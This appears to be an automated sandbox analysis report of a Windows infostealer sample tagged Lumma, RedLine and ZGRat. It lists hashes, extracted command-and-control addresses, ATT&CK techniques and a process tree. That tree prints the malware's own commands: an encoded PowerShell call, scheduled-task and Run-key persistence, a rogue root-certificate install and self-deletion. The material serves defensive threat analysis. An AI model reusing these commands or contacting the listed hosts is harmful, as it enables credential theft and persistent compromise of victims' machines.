lumma | 722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a

Analysis

max time kernel
202s
max time network
308s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
18-04-2024 22:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe
Size

18.8MB
MD5

9211e67da80fe6d9f713f6b4aece1d27
SHA1

e271997ff6d723260ac8af44e37ed6a59adaaac2
SHA256

722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a
SHA512

65950fbb4a3bc4bb0042502d5c4f363687e228e08fc606770323c2ac6590f241ab65ce53671dbaebaa958239154a33943c4132c9ad67554ae0bba9d4403e07ab
SSDEEP

393216:qynEX19Y0QBTstAfrrKgbKR2/KFZ9F9EIbHmWJqgLT1:qHLYPBTsmPKxvyIi0nX1

Score

10^/10

lumma redline zgrat @good_deay discovery infostealer persistence rat spyware stealer

Malware Config

Extracted

Family

redline

Botnet

@Good_Deay

45.15.156.167:80

Extracted

Family

lumma

https://poledoverglazedkilio.shop/api

https://productivelookewr.shop/api

https://tolerateilusidjukl.shop/api

https://shatterbreathepsw.shop/api

https://shortsvelventysjo.shop/api

https://incredibleextedwj.shop/api

https://alcojoldwograpciw.shop/api

https://liabilitynighstjsko.shop/api

https://demonstationfukewko.shop/api

Signatures

Detect ZGRat V1 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\svchost.exe	family_zgrat_v1
behavioral2/memory/4436-119-0x00000000005C0000-0x0000000000CD0000-memory.dmp	family_zgrat_v1

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4104-31-0x0000000000080000-0x00000000000FE000-memory.dmp	family_redline
behavioral2/memory/3656-32-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral2/memory/4104-33-0x0000000000080000-0x00000000000FE000-memory.dmp	family_redline

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file
Executes dropped EXE 8 IoCs

Processes:

eWdQP8BRmX.exebwMKr7H7pf.execonhost.exe7z.exe7z.exe7z.exesvchost.exeInstaller.exe

pid process

2088 eWdQP8BRmX.exe
4104 bwMKr7H7pf.exe
2864 conhost.exe
2704 7z.exe
4472 7z.exe
4392 7z.exe
4436 svchost.exe
3324 Installer.exe
Loads dropped DLL 4 IoCs

Processes:

7z.exe7z.exe7z.exesvchost.exe

pid process

2704 7z.exe
4472 7z.exe
4392 7z.exe
4436 svchost.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2088	eWdQP8BRmX.exe
4104	bwMKr7H7pf.exe
2864	conhost.exe
2704	7z.exe
4472	7z.exe
4392	7z.exe
4436	svchost.exe
3324	Installer.exe

pid	process
2704	7z.exe
4472	7z.exe
4392	7z.exe
4436	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2768987046-1485460554-1347040953-1000\Software\Microsoft\Windows\CurrentVersion\Run\kwweifjdskdv = "C:\\Users\\Admin\\AppData\\Local\\kwweifjdskdv\\kwweifjdskdv.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

52 pastebin.com
53 pastebin.com

flow	ioc
52	pastebin.com
53	pastebin.com

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exeeWdQP8BRmX.exe

pid	process
4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe
4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe
2088	eWdQP8BRmX.exe
2088	eWdQP8BRmX.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

bwMKr7H7pf.exesvchost.exeInstaller.exe

description	pid	process	target process
PID 4104 set thread context of 3656	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4436 set thread context of 4836	4436	svchost.exe	RegSvcs.exe
PID 3324 set thread context of 2668	3324	Installer.exe	RegSvcs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3972 schtasks.exe

pid	process
3972	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

RegAsm.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4640 PING.EXE

pid	process
4640	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exeeWdQP8BRmX.exeRegAsm.exeRegSvcs.exepowershell.exepowershell.exe

pid	process
4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe
4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe
2088	eWdQP8BRmX.exe
2088	eWdQP8BRmX.exe
3656	RegAsm.exe
3656	RegAsm.exe
3656	RegAsm.exe
2668	RegSvcs.exe
304	powershell.exe
304	powershell.exe
1116	powershell.exe
1116	powershell.exe
304	powershell.exe
1116	powershell.exe
2668	RegSvcs.exe
2668	RegSvcs.exe
2668	RegSvcs.exe
2668	RegSvcs.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

RegAsm.exe7z.exe7z.exe7z.exeRegSvcs.exeRegSvcs.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3656	RegAsm.exe
Token: SeRestorePrivilege	2704	7z.exe
Token: 35	2704	7z.exe
Token: SeSecurityPrivilege	2704	7z.exe
Token: SeSecurityPrivilege	2704	7z.exe
Token: SeRestorePrivilege	4472	7z.exe
Token: 35	4472	7z.exe
Token: SeSecurityPrivilege	4472	7z.exe
Token: SeSecurityPrivilege	4472	7z.exe
Token: SeRestorePrivilege	4392	7z.exe
Token: 35	4392	7z.exe
Token: SeSecurityPrivilege	4392	7z.exe
Token: SeSecurityPrivilege	4392	7z.exe
Token: SeDebugPrivilege	4836	RegSvcs.exe
Token: SeDebugPrivilege	2668	RegSvcs.exe
Token: SeDebugPrivilege	304	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exebwMKr7H7pf.execmd.exeRegAsm.execonhost.execmd.exesvchost.exeInstaller.exeRegSvcs.execmd.exe

description	pid	process	target process
PID 4140 wrote to memory of 2088	4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe	eWdQP8BRmX.exe
PID 4140 wrote to memory of 2088	4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe	eWdQP8BRmX.exe
PID 4140 wrote to memory of 2088	4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe	eWdQP8BRmX.exe
PID 4140 wrote to memory of 4104	4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe	bwMKr7H7pf.exe
PID 4140 wrote to memory of 4104	4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe	bwMKr7H7pf.exe
PID 4140 wrote to memory of 4104	4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe	bwMKr7H7pf.exe
PID 4104 wrote to memory of 5028	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 5028	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 5028	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 3656	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 3656	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 3656	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 3656	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 3656	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 3656	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 3656	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4104 wrote to memory of 3656	4104	bwMKr7H7pf.exe	RegAsm.exe
PID 4140 wrote to memory of 5040	4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe	cmd.exe
PID 4140 wrote to memory of 5040	4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe	cmd.exe
PID 4140 wrote to memory of 5040	4140	722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe	cmd.exe
PID 5040 wrote to memory of 4640	5040	cmd.exe	PING.EXE
PID 5040 wrote to memory of 4640	5040	cmd.exe	PING.EXE
PID 5040 wrote to memory of 4640	5040	cmd.exe	PING.EXE
PID 3656 wrote to memory of 2864	3656	RegAsm.exe	conhost.exe
PID 3656 wrote to memory of 2864	3656	RegAsm.exe	conhost.exe
PID 3656 wrote to memory of 2864	3656	RegAsm.exe	conhost.exe
PID 2864 wrote to memory of 2948	2864	conhost.exe	cmd.exe
PID 2864 wrote to memory of 2948	2864	conhost.exe	cmd.exe
PID 2948 wrote to memory of 2264	2948	cmd.exe	mode.com
PID 2948 wrote to memory of 2264	2948	cmd.exe	mode.com
PID 2948 wrote to memory of 2704	2948	cmd.exe	7z.exe
PID 2948 wrote to memory of 2704	2948	cmd.exe	7z.exe
PID 2948 wrote to memory of 4472	2948	cmd.exe	7z.exe
PID 2948 wrote to memory of 4472	2948	cmd.exe	7z.exe
PID 2948 wrote to memory of 4392	2948	cmd.exe	7z.exe
PID 2948 wrote to memory of 4392	2948	cmd.exe	7z.exe
PID 2948 wrote to memory of 4076	2948	cmd.exe	attrib.exe
PID 2948 wrote to memory of 4076	2948	cmd.exe	attrib.exe
PID 3656 wrote to memory of 4436	3656	RegAsm.exe	svchost.exe
PID 3656 wrote to memory of 4436	3656	RegAsm.exe	svchost.exe
PID 3656 wrote to memory of 4436	3656	RegAsm.exe	svchost.exe
PID 2948 wrote to memory of 3324	2948	cmd.exe	Installer.exe
PID 2948 wrote to memory of 3324	2948	cmd.exe	Installer.exe
PID 2948 wrote to memory of 3324	2948	cmd.exe	Installer.exe
PID 4436 wrote to memory of 4836	4436	svchost.exe	RegSvcs.exe
PID 4436 wrote to memory of 4836	4436	svchost.exe	RegSvcs.exe
PID 4436 wrote to memory of 4836	4436	svchost.exe	RegSvcs.exe
PID 4436 wrote to memory of 4836	4436	svchost.exe	RegSvcs.exe
PID 4436 wrote to memory of 4836	4436	svchost.exe	RegSvcs.exe
PID 4436 wrote to memory of 4836	4436	svchost.exe	RegSvcs.exe
PID 4436 wrote to memory of 4836	4436	svchost.exe	RegSvcs.exe
PID 4436 wrote to memory of 4836	4436	svchost.exe	RegSvcs.exe
PID 3324 wrote to memory of 2668	3324	Installer.exe	RegSvcs.exe
PID 3324 wrote to memory of 2668	3324	Installer.exe	RegSvcs.exe
PID 3324 wrote to memory of 2668	3324	Installer.exe	RegSvcs.exe
PID 3324 wrote to memory of 2668	3324	Installer.exe	RegSvcs.exe
PID 3324 wrote to memory of 2668	3324	Installer.exe	RegSvcs.exe
PID 2668 wrote to memory of 1224	2668	RegSvcs.exe	cmd.exe
PID 2668 wrote to memory of 1224	2668	RegSvcs.exe	cmd.exe
PID 2668 wrote to memory of 1224	2668	RegSvcs.exe	cmd.exe
PID 1224 wrote to memory of 304	1224	cmd.exe	powershell.exe
PID 1224 wrote to memory of 304	1224	cmd.exe	powershell.exe
PID 1224 wrote to memory of 304	1224	cmd.exe	powershell.exe
PID 4436 wrote to memory of 1116	4436	svchost.exe	powershell.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4076 attrib.exe

pid	process
4076	attrib.exe

C:\Users\Admin\AppData\Local\Temp\722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe
"C:\Users\Admin\AppData\Local\Temp\722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4140
- C:\Users\Admin\AppData\Local\Temp\eWdQP8BRmX.exe
  eWdQP8BRmX.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:2088
- C:\Users\Admin\AppData\Local\Temp\bwMKr7H7pf.exe
  bwMKr7H7pf.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4104
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5028
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Users\Admin\AppData\Local\Temp\conhost.exe
      "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2864
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2948
      - C:\Windows\system32\mode.com
        
        mode 65,10
        6⤵
        
        PID:2264
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p146312891125116171371883110193 -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4472
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4392
      - C:\Windows\system32\attrib.exe
        
        attrib +H "Installer.exe"
        6⤵
        Views/modifies file attributes
        
        PID:4076
      - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
        
        "Installer.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3324
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2668
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C powershell -EncodedCommand "PAAjAG4AVAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADMAbQBMAGYATABtAG8AOABhAGQANQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAFQARQBqAFYASwBPACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFkAQwA4ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAG4AVAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADMAbQBMAGYATABtAG8AOABhAGQANQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAFQARQBqAFYASwBPACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFkAQwA4ACMAPgA="
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:304
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        8⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        9⤵
        Creates scheduled task(s)
        
        PID:3972
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5279" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        8⤵
        
        PID:2296
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4436
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4836
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv' -Value '"C:\Users\Admin\AppData\Local\kwweifjdskdv\kwweifjdskdv.exe"' -PropertyType 'String'
        5⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1116
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\722d05592673cad0177a00fd3bf940e9ec656a623f28d42e5867bda0fe58b51a.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5040
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpC7E.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ee0x4g4z.hbb.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\bwMKr7H7pf.exe

Filesize
488KB

MD5
e1b561e9880d8d5204f20e281c5dc0a2

SHA1
730a2c9e166cb52202df5eb34352f656a901e2ad

SHA256
fe918ff5ea17f26dc67e9dce88ea0e9c36e7b7daf9b355a0f4d0a5046dd130ba

SHA512
ab139bb16c1faff8296b6c0fc868ecd215a6c2c81a88b79fa3ae174143f013abe1419f2e65580371402fd6c1a0acdfadd2dc455c6e09bd7ec2dc59fe79b0efc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\conhost.exe

Filesize
2.9MB

MD5
8340b7602e82921aa8d72ae4f8ea11cc

SHA1
a49524d26639130bc09acb4a0187917fbc5ec003

SHA256
efee38133480e7ccaa11424d49bb3d8ebdb89ffb1d81a10f6c405337e7d3a737

SHA512
eab92e881f24d6fdcb061540c3ee96f4d4fa9e26a7ef1ea82743ebca3e64821f94467cc65a2c3e83ee4c9091cc4e714e938b9f583c3dc9f88938555322e04f10

Download Submit
C:\Users\Admin\AppData\Local\Temp\eWdQP8BRmX.exe

Filesize
19.1MB

MD5
912799971263c4b4415c40071c065eeb

SHA1
ae8208e2f745b261788fe0898e9bdf83f8bd2fd8

SHA256
e78bb074a1c8cf551e781ec3e21f454d1a6a6560d966cf844e8abc7ab980360d

SHA512
e076766f7d770fef58bd4e54874e38e95df1c485c6388f240412c5770ea600b05f2ff9f131da8264afa6efbf3782f7a975c6795adac9af134bc12f82de5b14de

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

Filesize
2.2MB

MD5
b5e813efd092c823e641722e0e721cf2

SHA1
e381b6fc4a362091a4b09e6e366d15efdb6820d3

SHA256
fe75fd8c297d1d223ba238caa95e2d3bd9436538d125c8b87f62a297aeb11b42

SHA512
be677d3811cd2a3f6b187ac53e7086307776abc9fef39165c4b0a54aceaa332a88da84e4ce4234a653c12a2a57dabd77ddf74b40ae9e709436b8ac6ef7d96283

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

Filesize
610KB

MD5
6141fcd89a442521fabada983b07696a

SHA1
c884d75aa3df2ab52ad128146e45825466db257e

SHA256
5a4414a62987d89c24f62ba447cb25b3310a4e543dcb505a807e62a77d8d1426

SHA512
5f482678d7c71127d67f9b52d3e4c4e99111a4a2bbcbf36e299f57c6fffb354a490d573ee565b99483ac9b3ff015fc9337dffdb5d739a94d1994662a5dde0107

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

Filesize
499KB

MD5
ca8acb796044d922702f2fedd039c718

SHA1
45b997cc60b4875eec3f462006f1605dcb16c984

SHA256
710634857b5c70a6b6f014da45b0e1705a180aca3f2c1d53c39aa179d2451671

SHA512
591c1da7c720500440aa47bc52423457d0963eca381451a6163a144c0168ed863b45872020a2a6fa645b97db397e93060265f7c150616a039c2aed25cd0607da

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

